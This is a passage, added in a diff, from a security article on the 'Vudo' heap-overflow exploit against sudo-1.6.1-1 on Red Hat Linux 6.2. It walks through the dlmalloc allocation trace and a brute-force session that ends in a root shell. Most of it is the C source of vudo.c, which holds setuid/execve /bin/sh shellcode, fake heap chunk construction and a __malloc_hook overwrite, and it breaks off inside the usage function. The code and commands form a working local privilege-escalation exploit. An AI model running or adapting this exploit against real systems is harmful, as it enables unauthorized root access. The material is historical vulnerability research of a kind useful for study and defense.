+malloc( 23 ): 0x0806ee30;
+malloc( 12 ): 0x0806ee50;
+calloc( 7, 16 ): 0x0806ee60;
+malloc( 176 ): 0x0806f7f0;
+free( 0x0806f7f0 );
+malloc( 28 ): 0x0806f7f0;
+malloc( 5 ): 0x0806eed8;
+malloc( 11 ): 0x0806f810;
+malloc( 4095 ): 0x0806f820;
+
+This 4095 bytes buffer was allocated by the sudo_getpwuid() function,
+and is a simple copy of the SHELL environment variable provided by the
+Vudo exploit. Since Sudo was called with the -s option (the usefulness
+of this option is detailed subsequently), the size of the SHELL
+environment variable (including the trailing NUL character) cannot
+exceed 4095 bytes because of a check performed at the beginning of the
+find_path() function called by Sudo.
+
+The SHELL environment variable constructed by the exploit is exclusively
+composed of pointers indicating a single location on the stack, whose
+address does not contain any NUL byte (0xbfffff1e in this case). The
+reasons behind the choice of this particular address are exposed below.
+
+malloc( 1024 ): 0x08070828;
+malloc( 16 ): 0x08070c30;
+malloc( 8 ): 0x08070c48;
+malloc( 176 ): 0x08070c58;
+free( 0x08070c58 );
+malloc( 35 ): 0x08070c58;
+
+The next series of dlmalloc calls is performed by the load_interfaces()
+function, and is one of the keys to a successful exploitation of the
+Sudo vulnerability:
+
+malloc( 8200 ): 0x08070c80;
+malloc( 16 ): 0x08072c90;
+realloc( 0x08072c90, 8 ): 0x08072c90;
+free( 0x08070c80 );
+
+The 8200 bytes buffer and the 16 bytes buffer were allocated during
+the step[4] in malloc(3), and the latter (even once reallocated) was
+therefore stored immediately after the former. Moreover, a hole was
+created in the heap since the 8200 bytes buffer was freed during the
+step[4.3] of the free(3) algorithm.
+
+malloc( 2004 ): 0x08070c80;
+malloc( 176 ): 0x08071458;
+malloc( 4339 ): 0x08071510;
+
+The 2004 bytes buffer was allocated by the init_vars() function (because
+Sudo was called with the -s option) in order to hold pointers to the
+command and arguments to be executed by Sudo (provided by the Vudo
+exploit). This buffer was stored at the beginning of the previously
+freed 8200 bytes buffer, during the step[3.1] in malloc(3).
+
+The 176 and 4339 bytes buffers were allocated during the step[2.1] in
+malloc(3), and stored immediately after the end of the 2004 bytes buffer
+allocated above (the 4339 bytes buffer was created in order to hold the
+command and arguments to be executed by Sudo (provided by the exploit)).
+
+The next series of dlmalloc calls is performed by the setenv(3) function
+in order to create the SUDO_COMMAND environment variable:
+
+realloc( 0x00000000, 27468 ): 0x08072ca8;
+malloc( 4352 ): 0x080797f8;
+malloc( 16 ): 0x08072608;
+
+The 27468 bytes buffer was allocated by setenv(3) in order to hold
+pointers to the environment variables passed to Sudo by the exploit
+(the number of environment variables passed to Sudo was provided by the
+attacker (the third argument passed to the Vudo exploit)). Because of
+the considerable size of this buffer, it was allocated at step[4] in
+malloc(3), after the end of the 8 bytes buffer located immediately after
+the remainder of the 8200 bytes hole.
+
+The 4352 bytes buffer, the SUDO_COMMAND environment variable (whose size
+is equal to the size of the previously allocated 4339 bytes buffer,
+plus the size of the SUDO_COMMAND= prefix), was allocated at step[4] in
+malloc(3), and was therefore stored immediately after the end of the
+27468 bytes buffer allocated above.
+
+The 16 bytes buffer was allocated at step[3.1] in malloc(3), and is
+therefore located immediately after the end of the 4339 bytes buffer, in
+the remainder of the 8200 bytes hole.
+
+free( 0x08071510 );
+
+The 4339 bytes buffer was freed, at step[4.3] in free(3), and therefore
+created a hole in the heap (the allocated buffer stored before this
+hole is the 176 bytes buffer whose address is 0x08071458, the allocated
+buffer stored after this hole is the 16 bytes buffer whose address is
+0x08072608).
+
+The next series of dlmalloc calls is performed by the setenv(3) function
+in order to create the SUDO_USER environment variable:
+
+realloc( 0x08072ca8, 27472 ): 0x0807a900;
+malloc( 15 ): 0x08072620;
+malloc( 16 ): 0x08072638;
+
+The previously allocated 27468 bytes buffer was reallocated for
+additional space, but since it could not be extended (a too small free
+chunk was stored before (the remainder of the 8200 bytes hole) and an
+allocated chunk was stored after (the 4352 bytes buffer)), it was freed
+at step[5.4.2] in realloc(3) (a new hole was therefore created in the
+heap) and another chunk was allocated at step[5.4] in realloc(3).
+
+The 15 bytes buffer was allocated, during the step[3.1] in malloc(3),
+after the end of the 16 bytes buffer allocated above (whose address is
+equal to 0x08072608).
+
+The 16 bytes buffer was allocated, during the step[2.1] in malloc(3),
+after the end of the 15 bytes buffer allocated above (whose address is
+0x08072620).
+
+The next series of dlmalloc calls is performed by the setenv(3) function
+in order to create the SUDO_UID and SUDO_GID environment variables:
+
+realloc( 0x0807a900, 27476 ): 0x0807a900;
+malloc( 13 ): 0x08072650;
+malloc( 16 ): 0x08072668;
+realloc( 0x0807a900, 27480 ): 0x0807a900;
+malloc( 13 ): 0x08072680;
+malloc( 16 ): 0x08072698;
+
+The 13, 16, 13 and 16 bytes buffers were allocated after the end of
+the 16 bytes buffer allocated above (whose address is 0x08072638), in
+the remainder of the 8200 bytes hole. The address of the resulting
+`last_remainder' chunk, the free chunk stored after the end of the
+0x08072698 buffer and before the 0x08072c90 buffer, is equal to
+0x080726a8 (mem2chunk(0x08072698) + request2size(16)), and its effective
+size is equal to 1504 (mem2chunk(0x08072c90) - 0x080726a8) bytes.
+
+The next series of dlmalloc calls is performed by the setenv(3) function
+in order to create the PS1 environment variable:
+
+realloc( 0x0807a900, 27484 ): 0x0807a900;
+malloc( 1756 ): 0x08071510;
+malloc( 16 ): 0x08071bf0;
+
+The 1756 bytes buffer was allocated (during the step[3.1] in malloc(3))
+in order to hold the PS1 environment variable (whose size was computed
+by the Vudo exploit), and was stored at the beginning of the 4339 bytes
+hole created above.
+
+The remainder of this hole therefore became the new `last_remainder'
+chunk, and the old `last_remainder' chunk, whose effective size is equal
+to 1504 bytes, was therefore placed in its doubly-linked list (the list
+associated with the bin number 79) during the step[2.2.2] in malloc(3).
+
+The 16 bytes buffer was allocated during the step[2.1] in malloc(3), in
+the remainder of the 4339 bytes hole.
+
+malloc( 640 ): 0x08071c08;
+malloc( 400 ): 0x08071e90;
+
+The 640 and 400 bytes buffers were also allocated, during the step[2.1]
+in malloc(3), in the remainder of the 4339 bytes hole.
+
+malloc( 1600 ): 0x08072ca8;
+
+This 1600 bytes buffer, allocated at step[3.1] in malloc(3), was stored
+at the beginning of the 27468 bytes hole created above. The remainder of
+this huge hole therefore became the new `last_remainder' chunk, and the
+old `last_remainder' chunk, the remainder of the 4339 bytes hole, was
+placed in its bin at step[2.2.2] in malloc(3).
+
+Since the effective size of this old `last_remainder' chunk is equal
+to 1504 (request2size(4339) - request2size(1756) - request2size(16)
+- request2size(640) - request2size(400)) bytes, it was placed in the
+bin number 79 by frontlink(), in front of the 1504 bytes chunk already
+inserted in this bin as described above.
+
+The address of that old `last_remainder' chunk, 0x08072020
+(mem2chunk(0x08071e90) + request2size(400)), contains two SPACE
+characters, needed by the Vudo exploit in order to successfully exploit
+the Sudo vulnerability, as detailed below. This very special address was
+obtained thanks to the huge TZ environment variable mentioned above.
+
+malloc( 40 ): 0x080732f0;
+malloc( 16386 ): 0x08073320;
+malloc( 13 ): 0x08077328;
+free( 0x08077328 );
+malloc( 5 ): 0x08077328;
+free( 0x08077328 );
+malloc( 6 ): 0x08077328;
+free( 0x08071458 );
+malloc( 100 ): 0x08077338;
+realloc( 0x08077338, 19 ): 0x08077338;
+malloc( 100 ): 0x08077350;
+realloc( 0x08077350, 21 ): 0x08077350;
+free( 0x08077338 );
+free( 0x08077350 );
+
+All these buffers were allocated, during the step[2.1] in malloc(3), in
+the remainder of the 27468 bytes hole created above.
+
+The next series of dlmalloc calls is performed by easprintf(), a wrapper
+to vasprintf(3), in order to allocate space for the msg buffer:
+
+malloc( 100 ): 0x08077338;
+malloc( 300 ): 0x080773a0;
+free( 0x08077338 );
+malloc( 700 ): 0x080774d0;
+free( 0x080773a0 );
+malloc( 1500 ): 0x080726b0;
+free( 0x080774d0 );
+malloc( 3100 ): 0x08077338;
+free( 0x080726b0 );
+malloc( 6300 ): 0x08077f58;
+free( 0x08077338 );
+realloc( 0x08077f58, 4795 ): 0x08077f58;
+
+In order to allocate the 1500 bytes buffer, whose effective size is
+equal to 1504 (request2size(1500)) bytes, malloc(3) carried out the
+step[1.2] and returned (at step[1.2.2]) the last chunk in the bin number
+79, and therefore left the 0x08072020 chunk alone in this bin.
+
+But once unused, this 1500 bytes buffer was placed back in the bin
+number 79 by free(3), at step[4.3], in front of the 0x08072020 chunk
+already stored in this bin.
+
+The 6300 bytes buffer was allocated during the step[2.2.1] in malloc(3).
+Indeed, the size of the 27468 bytes hole was carefully chosen by the
+attacker (via the third argument passed to the Vudo exploit) so that,
+once allocated, the 6300 bytes buffer would fill this hole.
+
+Finally, the 6300 bytes buffer was reallocated for less space, during
+the step[4.1] of the realloc(3) algorithm. The reallocated buffer was
+created in order to hold the msg buffer, and the free chunk processed by
+chunk_free() during the step[4.1] of the realloc(3) algorithm was placed
+in its doubly-linked list. Since the effective size of this free chunk
+is equal to 1504 (request2size(6300) - request2size(4795)) bytes, it was
+placed in the bin number 79, in front of the two free chunks already
+stored in this bin.
+
+The next series of dlmalloc calls is performed by the first call to
+syslog(3), during the execution of the do_syslog() function:
+
+malloc( 192 ): 0x08072028;
+malloc( 8192 ): 0x08081460;
+realloc( 0x08081460, 997 ): 0x08081460;
+free( 0x08072028 );
+free( 0x08081460 );
+
+The 192 bytes buffer was allocated during the step[3.1] of the malloc(3)
+algorithm, and the processed chunk was the last chunk in the bin number
+79 (the 0x08072020 chunk).
+
+Once unused, the 192 bytes buffer was consolidated (at step[4.2] in
+free(3)) with the remainder of the previously split 1504 bytes chunk,
+and the resulting coalesced chunk was placed back (at step[4.3] in
+free(3)) in the bin number 79, in front of the two free chunks already
+stored in this bin.
+
+The bk field of the chunk of memory located immediately after the msg
+buffer was therefore overwritten by unlink() in order to point to the
+chunk 0x08072020.
+
+The next series of dlmalloc calls is performed by the second call to
+syslog(3), during the execution of the do_syslog() function:
+
+malloc( 192 ): 0x080726b0;
+malloc( 8192 ): 0x08081460;
+realloc( 0x08081460, 1018 ): 0x08081460;
+free( 0x080726b0 );
+free( 0x08081460 );
+
+The 192 bytes buffer was allocated during the step[3.1] of the malloc(3)
+algorithm, and the processed chunk was the last chunk in the bin number
+79 (the 0x080726a8 chunk).
+
+The bk field of the bin number 79 (the pointer to the last free chunk in
+the associated doubly-linked list) was therefore overwritten by unlink()
+with a pointer to the chunk of memory located immediately after the end
+of the msg buffer.
+
+Once unused, the 192 bytes buffer was consolidated (at step[4.2] in
+free(3)) with the remainder of the previously split 1504 bytes chunk,
+and the resulting coalesced chunk was placed back (at step[4.3] in
+free(3)) in the bin number 79, in front of the two free chunks already
+stored in this bin.
+
+As soon as this second call to syslog(3) was completed, the loop[7] of
+the do_syslog() function pushed the pointer p after the terminating NUL
+character associated with the msg buffer, until p pointed to the first
+SPACE character encountered. This first encountered SPACE character was
+of course the least significant byte of the bk field (still equal to
+0x08072020) associated with the chunk located immediately after msg.
+
+The do_syslog() function successfully passed the test[2] since no NUL
+byte was found between p and (p + MAXSYSLOGLEN) (indeed, this memory
+area is filled with the content of the previously allocated and freed
+27468 bytes buffer: pointers to the environment variables passed to Sudo
+by the exploit, and these environment variables were constructed by the
+exploit in order to avoid NUL and SPACE characters in their addresses).
+
+The byte overwritten with a NUL byte at line[5] in do_syslog() is the
+first encountered SPACE character when looping from (p + MAXSYSLOGLEN)
+down to p. Of course, this first encountered SPACE character was the
+second byte of the bk field (equal to 0x08072020) associated with the
+chunk located immediately after msg, since no other SPACE character
+could be found in the memory area between p and (p + MAXSYSLOGLEN), as
+detailed above.
+
+The bk field of the chunk located immediately after msg was therefore
+corrupted (its new value is equal to 0x08070020), in order to point to
+the very middle of the copy the SHELL environment variable mentioned
+above, before the next series of dlmalloc calls, performed by the third
+call to syslog(3), were carried out:
+
+malloc( 192 ): 0x08079218;
+malloc( 8192 ): 0x08081460;
+realloc( 0x08081460, 90 ): 0x08081460;
+free( 0x08079218 );
+free( 0x08081460 );
+
+The 192 bytes buffer was allocated during the step[3.1] of the malloc(3)
+algorithm, and the processed chunk was the last chunk in the bin number
+79 (the chunk located immediately after msg).
+
+The bk field of the bin number 79 (the pointer to the last free chunk in
+the associated doubly-linked list) was therefore overwritten by unlink()
+with the corrupted bk field of the chunk located immediately after msg.
+
+Once unused, the 192 bytes buffer was consolidated (at step[4.2] in
+free(3)) with the remainder of the previously split 1504 bytes chunk,
+and the resulting coalesced chunk was placed back (at step[4.3] in
+free(3)) in the bin number 79, in front of the two free chunks already
+stored in this bin (but one of these two chunks is of course a fake
+chunk pointed to by the corrupted bk field 0x08070020).
+
+Before the next series of dlmalloc calls is performed, by the fourth
+call to syslog(3), the erroneously overwritten SPACE character was
+restored at line[6] by do_syslog(), but since the corrupted bk pointer
+was copied to the bk field of the bin number 79 before, the Vudo exploit
+managed to permanently damage the internal structures used by dlmalloc:
+
+malloc( 192 ): 0xbfffff1e;
+malloc( 8192 ): 
+
+In order to allocate the 192 bytes buffer, the step[1.2] of the
+malloc(3) algorithm was carried out, and an imaginary chunk of memory,
+pointed to by the corrupted bk field, stored in the very middle of the
+copy of the SHELL environment variable, was processed. But since this
+fake chunk was too small (indeed, its size field is equal to 0xbfffff1e,
+a negative integer), its bk field (equal to 0xbfffff1e) was followed, to
+another fake chunk of memory stored on the stack, whose size is exactly
+200 (request2size(192)) bytes.
+
+This fake chunk was therefore taken off its imaginary doubly-linked
+list, allowing the attacker to apply the unlink() technique described in
+3.6.1 and to overwrite the __malloc_hook debugging hook with the address
+of a special shellcode stored somewhere in the heap (in order to bypass
+the Linux kernel patch from the Openwall Project).
+
+This shellcode was subsequently executed, at the beginning of the last
+call to malloc(3), since the corrupted __malloc_hook debugging hook was
+read and executed.
+
+----[ 4.2 - The practice ]----------------------------------------------
+
+In order to successfully gain root privileges via the Vudo exploit, a
+user does not necessarily need to be present in the sudoers file, but
+has to know their user password. They need additionally to provide three
+command line arguments:
+
+- the address of the __malloc_hook function pointer, which varies from
+one system to another but can be determined;
+
+- the size of the tz buffer, which varies slightly from one system to
+another and has to be brute forced;
+
+- the size of the envp buffer, which varies slightly from one system to
+another and has to be brute forced.
+
+A typical Vudo cult^H^H^H^Hsession starts with an authentication step,
+a __malloc_hook computation step, and eventually a brute force step,
+based on the tz and envp examples provided by the Vudo usage message
+(fortunately the user does not need to provide their password each time
+Sudo is executed during the brute force step because they authenticated
+right before):
+
+$ /usr/bin/sudo www.MasterSecuritY.fr
+Password:
+maxx is not in the sudoers file.  This incident will be reported.
+
+$ LD_TRACE_LOADED_OBJECTS=1 /usr/bin/sudo | grep /lib/libc.so.6
+        libc.so.6 => /lib/libc.so.6 (0x00161000)
+$ nm /lib/libc.so.6 | grep __malloc_hook
+000ef1dc W __malloc_hook
+$ perl -e 'printf "0x%08x\n", 0x00161000 + 0x000ef1dc'
+0x002501dc
+
+$ for tz in `seq 62587 8 65531`
+do
+for envp in `seq 6862 2 6874`
+do
+./vudo 0x002501dc $tz $envp
+done
+done
+maxx is not in the sudoers file.  This incident will be reported.
+maxx is not in the sudoers file.  This incident will be reported.
+maxx is not in the sudoers file.  This incident will be reported.
+maxx is not in the sudoers file.  This incident will be reported.
+maxx is not in the sudoers file.  This incident will be reported.
+maxx is not in the sudoers file.  This incident will be reported.
+maxx is not in the sudoers file.  This incident will be reported.
+maxx is not in the sudoers file.  This incident will be reported.
+maxx is not in the sudoers file.  This incident will be reported.
+maxx is not in the sudoers file.  This incident will be reported.
+bash#
+
+<++> vudo.c !32ad14e5
+/*
+ * vudo.c versus Red Hat Linux/Intel 6.2 (Zoot) sudo-1.6.1-1
+ * Copyright (C) 2001 Michel "MaXX" Kaempf <maxx@synnergy.net>
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or (at
+ * your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with this program; if not, write to the Free Software
+ * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+ * USA
+ */
+
+#include <limits.h>
+#include <paths.h>
+#include <pwd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+typedef struct malloc_chunk {
+    size_t prev_size;
+    size_t size;
+    struct malloc_chunk * fd;
+    struct malloc_chunk * bk;
+} * mchunkptr;
+
+#define SIZE_SZ sizeof(size_t)
+#define MALLOC_ALIGNMENT ( SIZE_SZ + SIZE_SZ )
+#define MALLOC_ALIGN_MASK ( MALLOC_ALIGNMENT - 1 )
+#define MINSIZE sizeof(struct malloc_chunk)
+
+/* shellcode */
+#define sc \
+    /* jmp */ \
+    "\xeb\x0appssssffff" \
+    /* setuid */ \
+    "\x31\xdb\x89\xd8\xb0\x17\xcd\x80" \
+    /* setgid */ \
+    "\x31\xdb\x89\xd8\xb0\x2e\xcd\x80" \
+    /* execve */ \
+    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" \
+    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" \
+    "\x80\xe8\xdc\xff\xff\xff/bin/sh"
+
+#define MAX_UID_T_LEN 10
+#define MAXSYSLOGLEN 960
+#define IFCONF_BUF r2s( 8200 )
+#define SUDOERS_FP r2s( 176 )
+#define VASPRINTF r2s( 6300 )
+#define VICTIM_SIZE r2s( 1500 )
+#define SUDO "/usr/bin/sudo"
+#define USER_CWD "/"
+#define MESSAGE 19 /* "command not allowed" or "user NOT in sudoers" */
+#define USER_ARGS ( VASPRINTF-VICTIM_SIZE-SIZE_SZ - 1 - (MAXSYSLOGLEN+1) )
+#define PREV_SIZE 0x5858614d
+#define SIZE r2s( 192 )
+#define SPACESPACE 0x08072020
+#define POST_PS1 ( r2s(16) + r2s(640) + r2s(400) )
+#define BK ( SPACESPACE - POST_PS1 + SIZE_SZ - sizeof(sc) )
+#define STACK ( 0xc0000000 - 4 )
+#define PRE_SHELL "SHELL="
+#define MAXPATHLEN 4095
+#define SHELL ( MAXPATHLEN - 1 )
+#define PRE_SUDO_PS1 "SUDO_PS1="
+#define PRE_TZ "TZ="
+#define LIBC "/lib/libc.so.6"
+#define TZ_FIRST ( MINSIZE - SIZE_SZ - 1 )
+#define TZ_STEP ( MALLOC_ALIGNMENT / sizeof(char) )
+#define TZ_LAST ( 0x10000 - SIZE_SZ - 1 )
+#define POST_IFCONF_BUF (r2s(1600)+r2s(40)+r2s(16386)+r2s(3100)+r2s(6300))
+#define ENVP_FIRST ( ((POST_IFCONF_BUF - SIZE_SZ) / sizeof(char *)) - 1 )
+#define ENVP_STEP ( MALLOC_ALIGNMENT / sizeof(char *) )
+
+/* request2size() */
+size_t
+r2s( size_t request )
+{
+    size_t size;
+
+    size = request + ( SIZE_SZ + MALLOC_ALIGN_MASK );
+    if ( size < (MINSIZE + MALLOC_ALIGN_MASK) ) {
+        size = MINSIZE;
+    } else {
+        size &= ~MALLOC_ALIGN_MASK;
+    }
+    return( size );
+}
+
+/* nul() */
+int
+nul( size_t size )
+{
+    char * p = (char *)( &size );
+
+    if ( p[0] == '\0' || p[1] == '\0' || p[2] == '\0' || p[3] == '\0' ) {
+        return( -1 );
+    }
+    return( 0 );
+}
+
+/* nul_or_space() */
+int
+nul_or_space( size_t size )
+{
+    char * p = (char *)( &size );
+
+    if ( p[0] == '\0' || p[1] == '\0' || p[2] == '\0' || p[3] == '\0' ) {
+        return( -1 );
+    }
+    if ( p[0] == ' ' || p[1] == ' ' || p[2] == ' ' || p[3] == ' ' ) {
+        return( -1 );
+    }
+    return( 0 );
+}
+
+typedef struct vudo_s {
+    /* command line */
+    size_t __malloc_hook;
+    size_t tz;
+    size_t envp;
+
+    size_t setenv;
+    size_t msg;
+    size_t buf;
+    size_t NewArgv;
+
+    /* execve */
+    char ** execve_argv;
+    char ** execve_envp;
+} vudo_t;
+
+/* vudo_setenv() */
+size_t
+vudo_setenv( uid_t uid )
+{
+    struct passwd * pw;
+    size_t setenv;
+    char idstr[ MAX_UID_T_LEN + 1 ];
+
+    /* pw */
+    pw = getpwuid( uid );
+    if ( pw == NULL ) {
+        return( 0 );
+    }
+
+    /* SUDO_COMMAND */
+    setenv = r2s( 16 );
+
+    /* SUDO_USER */
+    setenv += r2s( strlen("SUDO_USER=") + strlen(pw->pw_name) + 1 );
+    setenv += r2s( 16 );
+
+    /* SUDO_UID */
+    sprintf( idstr, "%ld", (long)(pw->pw_uid) );
+    setenv += r2s( strlen("SUDO_UID=") + strlen(idstr) + 1 );
+    setenv += r2s( 16 );
+
+    /* SUDO_GID */
+    sprintf( idstr, "%ld", (long)(pw->pw_gid) );
+    setenv += r2s( strlen("SUDO_GID=") + strlen(idstr) + 1 );
+    setenv += r2s( 16 );
+
+    return( setenv );
+}
+
+/* vudo_msg() */
+size_t
+vudo_msg( vudo_t * p_v )
+{
+    size_t msg;
+
+    msg = ( MAXSYSLOGLEN + 1 ) - strlen( "shell " ) + 3;
+    msg *= sizeof(char *);
+    msg += SIZE_SZ - IFCONF_BUF + p_v->setenv + SUDOERS_FP + VASPRINTF;
+    msg /= sizeof(char *) + 1;
+
+    return( msg );
+}
+
+/* vudo_buf() */
+size_t
+vudo_buf( vudo_t * p_v )
+{
+    size_t buf;
+
+    buf = VASPRINTF - VICTIM_SIZE - p_v->msg;
+
+    return( buf );
+}
+
+/* vudo_NewArgv() */
+size_t
+vudo_NewArgv( vudo_t * p_v )
+{
+    size_t NewArgv;
+
+    NewArgv = IFCONF_BUF-VICTIM_SIZE-p_v->setenv-SUDOERS_FP-p_v->buf;
+
+    return( NewArgv );
+}
+
+/* vudo_execve_argv() */
+char **
+vudo_execve_argv( vudo_t * p_v )
+{
+    size_t pudding;
+    char ** execve_argv;
+    char * p;
+    char * user_tty;
+    size_t size;
+    char * user_runas;
+    int i;
+    char * user_args;
+
+    /* pudding */
+    pudding = ( (p_v->NewArgv - SIZE_SZ) / sizeof(char *) ) - 3;
+
+    /* execve_argv */
+    execve_argv = malloc( (4 + pudding + 2) * sizeof(char *) );
+    if ( execve_argv == NULL ) {
+        return( NULL );
+    }
+
+    /* execve_argv[ 0 ] */
+    execve_argv[ 0 ] = SUDO;
+
+    /* execve_argv[ 1 ] */
+    execve_argv[ 1 ] = "-s";
+
+    /* execve_argv[ 2 ] */
+    execve_argv[ 2 ] = "-u";
+
+    /* user_tty */
+    if ( (p = ttyname(STDIN_FILENO)) || (p = ttyname(STDOUT_FILENO)) ) {
+        if ( strncmp(p, _PATH_DEV, sizeof(_PATH_DEV) - 1) == 0 ) {
+            p += sizeof(_PATH_DEV) - 1;
+        }
+        user_tty = p;
+    } else {
+        user_tty = "unknown";
+    }
+
+    /* user_cwd */
+    if ( chdir(USER_CWD) == -1 ) {
+        return( NULL );
+    }
+
+    /* user_runas */
+    size = p_v->msg;
+    size -= MESSAGE;
+    size -= strlen( " ; TTY= ; PWD= ; USER= ; COMMAND=" );
+    size -= strlen( user_tty );
+    size -= strlen( USER_CWD );
+    user_runas = malloc( size + 1 );
+    if ( user_runas == NULL ) {
+        return( NULL );
+    }
+    memset( user_runas, 'M', size );
+    user_runas[ size ] = '\0';
+
+    /* execve_argv[ 3 ] */
+    execve_argv[ 3 ] = user_runas;
+
+    /* execve_argv[ 4 ] .. execve_argv[ (4 + pudding) - 1 ] */
+    for ( i = 4; i < 4 + pudding; i++ ) {
+        execve_argv[ i ] = "";
+    }
+
+    /* user_args */
+    user_args = malloc( USER_ARGS + 1 );
+    if ( user_args == NULL ) {
+        return( NULL );
+    }
+    memset( user_args, 'S', USER_ARGS );
+    user_args[ USER_ARGS ] = '\0';
+
+    /* execve_argv[ 4 + pudding ] */
+    execve_argv[ 4 + pudding ] = user_args;
+
+    /* execve_argv[ (4 + pudding) + 1 ] */
+    execve_argv[ (4 + pudding) + 1 ] = NULL;
+
+    return( execve_argv );
+}
+
+/* vudo_execve_envp() */
+char **
+vudo_execve_envp( vudo_t * p_v )
+{
+    size_t fd;
+    char * chunk;
+    size_t post_pudding;
+    int i;
+    size_t pudding;
+    size_t size;
+    char * post_chunk;
+    size_t p_chunk;
+    char * shell;
+    char * p;
+    char * sudo_ps1;
+    char * tz;
+    char ** execve_envp;
+    size_t stack;
+
+    /* fd */
+    fd = p_v->__malloc_hook - ( SIZE_SZ + SIZE_SZ + sizeof(mchunkptr) );
+
+    /* chunk */
+    chunk = malloc( MINSIZE + 1 );
+    if ( chunk == NULL ) {
+        return( NULL );
+    }
+    ( (mchunkptr)chunk )->prev_size = PREV_SIZE;
+    ( (mchunkptr)chunk )->size = SIZE;
+    ( (mchunkptr)chunk )->fd = (mchunkptr)fd;
+    ( (mchunkptr)chunk )->bk = (mchunkptr)BK;
+    chunk[ MINSIZE ] = '\0';
+
+    /* post_pudding */
+    post_pudding = 0;
+    for ( i = 0; i < MINSIZE + 1; i++ ) {
+        if ( chunk[i] == '\0' ) {
+            post_pudding += 1;
+        }
+    }
+
+    /* pudding */
+    pudding = p_v->envp - ( 3 + post_pudding + 2 );
+
+    /* post_chunk */
+    size = ( SIZE - 1 ) - 1;
+    while ( nul(STACK - sizeof(SUDO) - (size + 1) - (MINSIZE + 1)) ) {
+        size += 1;
+    }
+    post_chunk = malloc( size + 1 );
+    if ( post_chunk == NULL ) {
+        return( NULL );
+    }
+    memset( post_chunk, 'Y', size );
+    post_chunk[ size ] = '\0';
+
+    /* p_chunk */
+    p_chunk = STACK - sizeof(SUDO) - (strlen(post_chunk)+1) - (MINSIZE+1);
+
+    /* shell */
+    shell = malloc( strlen(PRE_SHELL) + SHELL + 1 );
+    if ( shell == NULL ) {
+        return( NULL );
+    }
+    p = shell;
+    memcpy( p, PRE_SHELL, strlen(PRE_SHELL) );
+    p += strlen( PRE_SHELL );
+    while ( p < shell + strlen(PRE_SHELL) + (SHELL & ~(SIZE_SZ-1)) ) {
+        *((size_t *)p) = p_chunk;
+        p += SIZE_SZ;
+    }
+    while ( p < shell + strlen(PRE_SHELL) + SHELL ) {
+        *(p++) = '2';
+    }
+    *p = '\0';
+
+    /* sudo_ps1 */
+    size = p_v->buf;
+    size -= POST_PS1 + VICTIM_SIZE;
+    size -= strlen( "PS1=" ) + 1 + SIZE_SZ;
+    sudo_ps1 = malloc( strlen(PRE_SUDO_PS1) + size + 1 );
+    if ( sudo_ps1 == NULL ) {
+        return( NULL );
+    }
+    memcpy( sudo_ps1, PRE_SUDO_PS1, strlen(PRE_SUDO_PS1) );
+    memset( sudo_ps1 + strlen(PRE_SUDO_PS1), '0', size + 1 - sizeof(sc) );
+    strcpy( sudo_ps1 + strlen(PRE_SUDO_PS1) + size + 1 - sizeof(sc), sc );
+
+    /* tz */
+    tz = malloc( strlen(PRE_TZ) + p_v->tz + 1 );
+    if ( tz == NULL ) {
+        return( NULL );
+    }
+    memcpy( tz, PRE_TZ, strlen(PRE_TZ) );
+    memset( tz + strlen(PRE_TZ), '0', p_v->tz );
+    tz[ strlen(PRE_TZ) + p_v->tz ] = '\0';
+
+    /* execve_envp */
+    execve_envp = malloc( p_v->envp * sizeof(char *) );
+    if ( execve_envp == NULL ) {
+        return( NULL );
+    }
+
+    /* execve_envp[ p_v->envp - 1 ] */
+    execve_envp[ p_v->envp - 1 ] = NULL;
+
+    /* execve_envp[3+pudding] .. execve_envp[(3+pudding+post_pudding)-1] */
+    p = chunk;
+    for ( i = 3 + pudding; i < 3 + pudding + post_pudding; i++ ) {
+        execve_envp[ i ] = p;
+        p += strlen( p ) + 1;
+    }
+
+    /* execve_envp[ 3 + pudding + post_pudding ] */
+    execve_envp[ 3 + pudding + post_pudding ] = post_chunk;
+
+    /* execve_envp[ 0 ] */
+    execve_envp[ 0 ] = shell;
+
+    /* execve_envp[ 1 ] */
+    execve_envp[ 1 ] = sudo_ps1;
+
+    /* execve_envp[ 2 ] */
+    execve_envp[ 2 ] = tz;
+
+    /* execve_envp[ 3 ] .. execve_envp[ (3 + pudding) - 1 ] */
+    i = 3 + pudding;
+    stack = p_chunk;
+    while ( i-- > 3 ) {
+        size = 0;
+        while ( nul_or_space(stack - (size + 1)) ) {
+            size += 1;
+        }
+        if ( size == 0 ) {
+            execve_envp[ i ] = "";
+        } else {
+            execve_envp[ i ] = malloc( size + 1 );
+            if ( execve_envp[i] == NULL ) {
+                return( NULL );
+            }
+            memset( execve_envp[i], '1', size );
+            ( execve_envp[ i ] )[ size ] = '\0';
+        }
+        stack -= size + 1;
+    }
+
+    return( execve_envp );
+}
+
+/* usage() */
+void
+usage( char * fn )
+{
+    printf(
+        "%s versus Red Hat Linux/Intel 6.2 (Zoot) sudo-1.6.1-1\n",
+        fn
+    );
+    printf(
+        "Copyright (C) 2001 Michel \"MaXX\" Kaempf <maxx@synnergy.net>\n"
+    );
+    printf( "\n" );
+
+    printf( "* Usage: %s __malloc_hook tz envp\n", fn );
+    printf( "\n" );
+
+    printf( "* Example: %s 0x002501dc 62595 6866\n", fn );
+    printf( "\n" );
+
+    printf( "* __malloc_hook:\n" );
+    printf( "  $ LD_TRACE_LOADED_OBJECTS=1 %s | grep %s\n", SUDO, LIBC );
+    printf( "  $ objdump --syms %s | grep __malloc_hook\n", LIBC );
+    printf( "  $ nm %s | grep __malloc_hook\n", LIBC );
+    printf( "\n" );
+
+    printf( "* tz:\n" );
+    printf( "  - first: %u\n", TZ_FIRST );
+    printf( "  - step: %u\n", TZ_STEP );
+    printf( "  - last: %u\n", TZ_LAST );
+    printf( "\n" );
+
+    printf( "* envp:\n" );
